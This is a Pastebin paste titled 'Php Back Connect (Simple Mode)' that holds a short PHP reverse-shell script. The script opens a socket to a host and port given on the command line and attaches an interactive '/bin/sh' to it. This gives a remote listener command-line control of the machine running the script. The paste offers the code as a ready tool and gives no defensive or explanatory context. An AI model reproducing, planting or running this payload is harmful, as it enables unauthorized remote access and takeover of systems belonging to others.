RintoMuhamad

Php Back Connect (Simple Mode)

May 13th, 2017
591
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.15 KB | None | 0 0
  1. <?php
  2. #Usage : php filename.php HOST PORT
  3. $iplo = $argv[1];
  4. $portlo = $argv[2];
  5. $sock=fsockopen($iplo, $portlo);
  6. exec("/bin/sh -i <&3 >&3 2>&3");
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment